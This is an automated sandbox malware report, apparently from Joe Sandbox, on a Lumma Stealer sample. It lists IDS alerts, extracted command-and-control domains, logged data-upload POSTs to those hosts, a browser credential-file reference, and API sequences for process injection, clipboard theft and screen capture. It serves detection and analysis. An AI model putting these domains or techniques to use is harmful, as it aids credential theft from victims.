                Source: Network trafficSuricata IDS: 2058599 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI) : 192.168.2.6:49990 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2058599 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI) : 192.168.2.6:49989 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2058599 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI) : 192.168.2.6:49988 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2058599 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI) : 192.168.2.6:49991 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2058599 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI) : 192.168.2.6:49993 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2058599 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI) : 192.168.2.6:49994 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2058599 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI) : 192.168.2.6:49992 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49709 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49709 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49986 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49986 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49988 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49898 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49898 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49994 -> 104.21.96.1:443
                Source: Malware configuration extractorURLs: noisycuttej.shop
                Source: Malware configuration extractorURLs: nearycrepso.shop
                Source: Malware configuration extractorURLs: framekgirus.shop
                Source: Malware configuration extractorURLs: abruptyopsn.shop
                Source: Malware configuration extractorURLs: tirepublicerj.shop
                Source: Malware configuration extractorURLs: rabidcowse.shop
                Source: Malware configuration extractorURLs: wholersorie.shop
                Source: Malware configuration extractorURLs: cloudewahsj.shop
                Source: Malware configuration extractorURLs: undesirabkel.click
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49709 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49898 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49986 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49990 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49989 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49988 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49991 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49993 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49994 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49992 -> 104.21.96.1:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: undesirabkel.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: abruptyopsn.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: abruptyopsn.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2MUNY1F2TDRUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12824Host: abruptyopsn.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4Z5YHEY2OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15058Host: abruptyopsn.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AHFIYDV7YKGV8GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19946Host: abruptyopsn.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=11I7CUU94REU7W6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 643165Host: abruptyopsn.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YJXWJ58MFD0S9MHS2YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1221Host: abruptyopsn.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TO4PJTFMAFGJ6OA7YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570636Host: abruptyopsn.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 89Host: abruptyopsn.shop
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: undesirabkel.click
                Source: global trafficDNS traffic detected: DNS query: nearycrepso.shop
                Source: global trafficDNS traffic detected: DNS query: abruptyopsn.shop
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: undesirabkel.click
                Source: aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: aspnet_regiis.exe, 00000003.00000003.2700922914.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783642463.000000000349B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773860884.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2793627901.000000000349B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783743972.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773630048.0000000003499000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2725007769.000000000345D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2830061957.00000000034AE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2700786138.0000000003499000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.miH
                Source: aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                Source: aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: aspnet_regiis.exe, 00000003.00000003.2830061957.00000000034CE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2712906052.00000000058C6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2712090796.00000000058B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://abruptyopsn.shop/
                Source: aspnet_regiis.exe, 00000003.00000003.2700805678.0000000003431000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abruptyopsn.shop/22h
                Source: aspnet_regiis.exe, 00000003.00000003.2738030151.00000000034CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abruptyopsn.shop/4
                Source: aspnet_regiis.exe, 00000003.00000002.3389991161.00000000034CE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2830061957.00000000034CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abruptyopsn.shop/N
                Source: aspnet_regiis.exe, 00000003.00000003.2700805678.000000000345D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abruptyopsn.shop/Ow
                Source: aspnet_regiis.exe, 00000003.00000003.2725007769.00000000034CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abruptyopsn.shop/Y
                Source: aspnet_regiis.exe, 00000003.00000003.2712090796.00000000058B9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2700805678.0000000003450000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2830061957.00000000034AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abruptyopsn.shop/api
                Source: aspnet_regiis.exe, 00000003.00000003.2793627901.00000000034CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abruptyopsn.shop/api4
                Source: aspnet_regiis.exe, 00000003.00000003.2712090796.00000000058B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://abruptyopsn.shop/api9v9-
                Source: aspnet_regiis.exe, 00000003.00000003.2783642463.000000000349B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773860884.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2793627901.000000000349B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783743972.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2788196527.00000000034B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783789033.00000000034B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773630048.0000000003499000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3389965700.00000000034B3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773956570.00000000034B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2830061957.00000000034AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abruptyopsn.shop/apiB
                Source: aspnet_regiis.exe, 00000003.00000003.2712090796.00000000058B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://abruptyopsn.shop/apiNET;
                Source: aspnet_regiis.exe, 00000003.00000003.2783642463.000000000349B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773860884.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2793627901.000000000349B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783743972.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2788196527.00000000034B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783789033.00000000034B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773630048.0000000003499000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3389965700.00000000034B3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773956570.00000000034B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2830061957.00000000034AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abruptyopsn.shop/apid
                Source: aspnet_regiis.exe, 00000003.00000003.2783642463.000000000349B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783743972.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783789033.00000000034B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abruptyopsn.shop/apii
                Source: aspnet_regiis.exe, 00000003.00000003.2773956570.00000000034CE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2738030151.00000000034CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abruptyopsn.shop/g
                Source: aspnet_regiis.exe, 00000003.00000003.2783626201.00000000058C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://abruptyopsn.shop:443/apial
                Source: aspnet_regiis.exe, 00000003.00000003.2788177021.00000000058C1000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2829918442.00000000058C0000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3390437810.00000000058C3000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783626201.00000000058C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://abruptyopsn.shop:443/apiffxt.default-release/key4.dbPK
                Source: aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: aspnet_regiis.exe, 00000003.00000003.2726569817.00000000034D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                Source: aspnet_regiis.exe, 00000003.00000003.2726569817.00000000034D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                Source: aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: aspnet_regiis.exe, 00000003.00000003.2726569817.00000000034D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                Source: aspnet_regiis.exe, 00000003.00000003.2726569817.00000000034D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: aspnet_regiis.exe, 00000003.00000003.2726569817.00000000034D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: aspnet_regiis.exe, 00000003.00000003.2726290907.00000000059D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: aspnet_regiis.exe, 00000003.00000003.2726290907.00000000059D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: aspnet_regiis.exe, 00000003.00000003.2726569817.00000000034D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                Source: aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: aspnet_regiis.exe, 00000003.00000003.2726217533.00000000058EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
                Source: aspnet_regiis.exe, 00000003.00000003.2726217533.00000000058EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                Source: aspnet_regiis.exe, 00000003.00000003.2726290907.00000000059D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                Source: aspnet_regiis.exe, 00000003.00000003.2726290907.00000000059D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                Source: aspnet_regiis.exe, 00000003.00000003.2726290907.00000000059D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: aspnet_regiis.exe, 00000003.00000003.2726569817.00000000034D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49898 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49986 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49988 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49989 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49990 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49991 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49992 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49993 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49994 version: TLS 1.2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031A2FF0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_031A2FF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_05711000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,3_2_05711000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031A2FF0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_031A2FF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031A41B0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_031A41B0

                System Summary

                barindex
                Source: PASS-1234.exeStatic PE information: section name: C;FTo
                Source: PASS-1234.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_6D387E40 WindowsHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,CreateProcessW,NtGetContextThread,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtAllocateVirtualMemory,NtWriteVirtualMemory,CloseHandle,CloseHandle,NtCreateThreadEx,0_2_6D387E40
